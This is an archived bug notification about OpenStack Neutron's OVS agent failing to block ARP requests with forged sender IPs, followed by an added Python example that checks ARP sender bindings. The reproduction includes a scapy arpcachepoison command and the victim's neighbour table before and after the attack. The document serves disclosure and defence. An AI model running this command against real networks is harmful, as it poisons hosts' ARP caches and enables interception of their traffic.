yahoo-eng-team team mailing list archive

[Bug 1456333] Re: ovs-agent: doesn't prevent arp requests with faked ips

 

** Changed in: neutron
       Status: Fix Committed => Fix Released

** Changed in: neutron
    Milestone: None => liberty-1

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1456333

Title:
  ovs-agent: doesn't prevent arp requests with faked ips

Status in OpenStack Neutron (virtual network service):
  Fix Released

Bug description:
  Patch
  https://git.openstack.org/cgit/openstack/neutron/commit/?id=aa7356b729f9672855980429677c969b6bab61a1
  set up rules on br-int to prevent faking the IP address in ARP replies.
  But it's also possible to poison a neighbour's ARP cache with a bogus
  ARP request, as the victim updates its cache on receipt of it. That is
  how arpcachepoison in scapy works.

  Here the attacker is 10.0.1.6 and the victim is 10.0.1.7

  victim# ip n
  10.0.1.6 dev tapfccaf7c3-01 lladdr fa:16:3e:33:58:4e STALE
  10.0.1.1 dev tapfccaf7c3-01 lladdr fa:16:3e:10:d3:b2 STALE

  attacker#  scapy
  INFO: Can't import python gnuplot wrapper . Won't be able to plot.
  INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
  WARNING: No route found for IPv6 destination :: (no default route?)
  Welcome to Scapy (2.2.0)
  >>> arpcachepoison("10.0.1.7", "10.0.1.1", interval=1)

  victim# ip n
  10.0.1.6 dev tapfccaf7c3-01 lladdr fa:16:3e:33:58:4e STALE
  10.0.1.1 dev tapfccaf7c3-01 lladdr fa:16:3e:33:58:4e STALE

  This is at the same level as
  https://bugs.launchpad.net/neutron/+bug/1274034, which was deemed not
  to be a security vulnerability.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1456333/+subscriptions
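
The report's point is that a sender-address check limited to ARP replies leaves requests unchecked. The following is an added example, not code from the bug report or from Neutron: a per-port check on the ARP sender fields that ignores the opcode. The binding table, function names and sample frames are assumptions, constructed from the addresses in the report.

```python
import socket
import struct

ETH_P_ARP = 0x0806
ARP_FMT = "!HHBBH6s4s6s4s"  # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa

# Hypothetical per-port binding table: (MAC, IP) pairs the port may claim.
ATTACKER_PORT = {("fa:16:3e:33:58:4e", "10.0.1.6")}

def _mac(text):
    return bytes.fromhex(text.replace(":", ""))

def build_arp(oper, sha, spa, tpa):
    """Constructed test input: broadcast Ethernet header plus ARP payload."""
    eth = struct.pack("!6s6sH", b"\xff" * 6, _mac(sha), ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, oper, _mac(sha),
                      socket.inet_aton(spa), b"\x00" * 6, socket.inet_aton(tpa))
    return eth + arp

def check_arp(frame, allowed):
    """Return (verdict, reason) for a frame received from a port."""
    if len(frame) < 14:
        return "drop", "truncated"
    if struct.unpack_from("!H", frame, 12)[0] != ETH_P_ARP:
        return "pass", "not ARP"
    if len(frame) < 14 + struct.calcsize(ARP_FMT):
        return "drop", "truncated"
    htype, ptype, hlen, plen, oper, sha, spa, _tha, _tpa = struct.unpack_from(
        ARP_FMT, frame, 14)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return "drop", "unexpected ARP format"
    mac = ":".join(f"{b:02x}" for b in sha)
    ip = socket.inet_ntoa(spa)
    # The opcode is reported but never consulted: a request (1) and a
    # reply (2) both let the receiver update its cache from sha/spa.
    if (mac, ip) not in allowed:
        return "drop", f"op={oper} claims {ip} is at {mac}"
    return "pass", f"op={oper} sender binding ok"

if __name__ == "__main__":
    mac = "fa:16:3e:33:58:4e"
    for oper, spa in [(1, "10.0.1.6"), (1, "10.0.1.1"), (2, "10.0.1.1")]:
        frame = build_arp(oper, mac, spa, "10.0.1.7")
        print(oper, spa, check_arp(frame, ATTACKER_PORT))
```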

